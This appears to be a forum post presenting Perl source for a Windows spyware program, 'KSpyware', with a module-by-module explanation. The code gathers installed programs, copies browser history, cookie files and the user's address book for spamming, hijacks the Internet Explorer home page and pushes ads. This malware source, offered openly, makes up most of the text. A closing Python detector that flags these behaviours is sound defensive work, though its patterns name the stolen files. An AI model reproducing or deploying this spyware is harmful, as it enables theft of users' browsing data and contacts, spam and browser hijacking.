Source code of the spyware virus
Code:
############################################
### KSpyware v0.1 for educational purpose ###############
############################################
use Win32;
use File::Xcopy qw(xcopy);
use Win32::TieRegistry ( Delimiter=>"/", ArrayValues=>1 );
use Win32::NetSend;
############################################
### With the code below, we can obtain the installed #########
### programs on the system #########################
############################################
sub programfiles{
open(PF, '>C:\\spy\\pf.txt')
or die "I can't open the file\n";
opendir(PROGRAMFILES, 'C:\\Program Files\\')
or die "A problem occured.";
print PF join(' - ', readdir(PROGRAMFILES));
closedir PRGRAMFILES;
close PF;
}
#########################################
### With the code below, we can obtain the urls #########
### the victim visited and the cookies ################
#########################################
sub indexsites {
my $name;
$name=Win32::LoginName();
$from = "C:\\WINNT\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\WinntTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\WINNT\\Cookies\\index.dat";
$to = "C:\\spy\\WinntCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\LocalTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Cookies\\index.dat";
$to = "C:\\spy\\LocalCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
}
########################################
### With the code below, we can obtain a list of ########
### e-mail addresses (for spam...) #################
#######################################
sub mails {
my $name;
$name=Win32::LoginName();
$from = "C:\\Documents and Settings\\" . $name .
"\\Application Data\\Microsoft\\Address Book\\" . $name . ".wab";
$to = "C:\\spy\\" . $name . ".wab";
Win32::CopyFile($from, $to, 0);
}
#####################################
### Hijack IE by modifying the main page ##########
#####################################
sub mainpage {
$userKey= $Registry->
{"CUser/Software/Microsoft/Internet Explorer/"};
$userKey->{"Main//Start Page"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
}
#########################################
### With the code below, Net Send is used to spam #######
### or send ads to the user (Net Send must be activated)####
#########################################
sub pub {
$NetSend->Send(
to => "127.0.0.1",
message => "Here, a small ad in order to earn money or to spam!!!");
}
###################
### Entry point !!! #######
###################
$dir = "C:\\spy\\";
mkdir $dir or die "An error occured\n";
programfiles();
indexsites();
mails();
mainpage();
pub();
exit 0;
Now I will explain what each module of this Perl code does.
With this code we obtain a list of the programs installed on the system.
Code:
############################################
### With the code below, we can obtain the installed #########
### programs on the system #########################
############################################
sub programfiles{
open(PF, '>C:\\spy\\pf.txt')
or die "I can't open the file\n";
opendir(PROGRAMFILES, 'C:\\Program Files\\')
or die "A problem occured.";
print PF join(' - ', readdir(PROGRAMFILES));
closedir PRGRAMFILES;
close PF;
}
With this code we obtain the URLs the victim has visited, as well as the cookies.
Code:
#########################################
### With the code below, we can obtain the urls #########
### the victim visited and the cookies ################
#########################################
sub indexsites {
my $name;
$name=Win32::LoginName();
$from = "C:\\WINNT\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\WinntTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\WINNT\\Cookies\\index.dat";
$to = "C:\\spy\\WinntCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\LocalTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Cookies\\index.dat";
$to = "C:\\spy\\LocalCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
}
With this code we obtain e-mail addresses in order to send spam...
Code:
########################################
### With the code below, we can obtain a list of ########
### e-mail addresses (for spam...) #################
#######################################
sub mails {
my $name;
$name=Win32::LoginName();
$from = "C:\\Documents and Settings\\" . $name .
"\\Application Data\\Microsoft\\Address Book\\" . $name . ".wab";
$to = "C:\\spy\\" . $name . ".wab";
Win32::CopyFile($from, $to, 0);
}
With this code we sabotage Internet Explorer to change the home page.
Code:
#####################################
### Hijack IE by modifying the main page ##########
#####################################
sub mainpage {
$userKey= $Registry->
{"CUser/Software/Microsoft/Internet Explorer/"};
$userKey->{"Main//Start Page"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
}
To use this code, Net Send must be enabled; that way we can send ads, etc. It works like spam.
Code:
#########################################
### With the code below, Net Send is used to spam #######
### or send ads to the user (Net Send must be activated)####
#########################################
sub pub {
$NetSend->Send(
to => "127.0.0.1",
message => "Here, a small ad in order to earn money or to spam!!!");
}
And this is the entry point...
Code:
###################
### Entry point !!! #######
###################
$dir = "C:\\spy\\";
mkdir $dir or die "An error occured\n";
programfiles();
indexsites();
mails();
mainpage();
pub();
exit 0;
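
Seen from the defender's side, the behaviours in this listing (copying index.dat and .wab files, then rewriting the IE Start Page value) can be correlated per process. The following is an added example, not part of the original post: the event records are constructed and simplified, and the field names and the allow-list of expected images are assumptions.

```python
import re
from collections import defaultdict

# Data the sample copies: IE index.dat files and the Windows Address Book (.wab).
SENSITIVE_SRC = re.compile(r"\\(index\.dat|[^\\]+\.wab)$", re.I)
START_PAGE = re.compile(
    r"\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page(_bak)?$", re.I)
# Assumption: images expected to touch that data; tune per environment.
EXPECTED_IMAGES = {"iexplore.exe", "wab.exe", "explorer.exe"}

def findings(events):
    """Map (host, pid) -> set of behaviour tags seen for that process."""
    tags = defaultdict(set)
    for ev in events:
        if ev["image"].rsplit("\\", 1)[-1].lower() in EXPECTED_IMAGES:
            continue
        proc = (ev["host"], ev["pid"])
        if ev["type"] == "file_copy" and SENSITIVE_SRC.search(ev["src"]):
            is_wab = ev["src"].lower().endswith(".wab")
            tags[proc].add("address_book_copy" if is_wab else "ie_index_copy")
        elif ev["type"] == "reg_set" and START_PAGE.search(ev["key"]):
            tags[proc].add("start_page_change")
    return dict(tags)

def correlated(events, min_tags=2):
    """Processes showing at least min_tags distinct behaviours."""
    return sorted(p for p, t in findings(events).items() if len(t) >= min_tags)

# Constructed sample records (simplified; not a real log schema).
PROFILE = "C:\\Documents and Settings\\alice"
IE_MAIN = "HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page"
SAMPLE = [
    {"host": "ws01", "pid": 4120, "image": "C:\\Perl\\bin\\perl.exe",
     "type": "file_copy", "src": PROFILE + "\\Cookies\\index.dat"},
    {"host": "ws01", "pid": 4120, "image": "C:\\Perl\\bin\\perl.exe",
     "type": "file_copy",
     "src": PROFILE + "\\Application Data\\Microsoft\\Address Book\\alice.wab"},
    {"host": "ws01", "pid": 4120, "image": "C:\\Perl\\bin\\perl.exe",
     "type": "reg_set", "key": IE_MAIN},
    {"host": "ws01", "pid": 812, "type": "reg_set", "key": IE_MAIN,
     "image": "C:\\Program Files\\Internet Explorer\\iexplore.exe"},
    {"host": "ws02", "pid": 300, "image": "C:\\Tools\\backup.exe",
     "type": "file_copy", "src": PROFILE + "\\Cookies\\index.dat"},
]

if __name__ == "__main__":
    for proc, tags in sorted(findings(SAMPLE).items()):
        print(proc, sorted(tags))
```

A single tag, such as a backup tool reading index.dat, is weak evidence on its own; the combination of data collection and a Start Page change in one process is what correlated() surfaces.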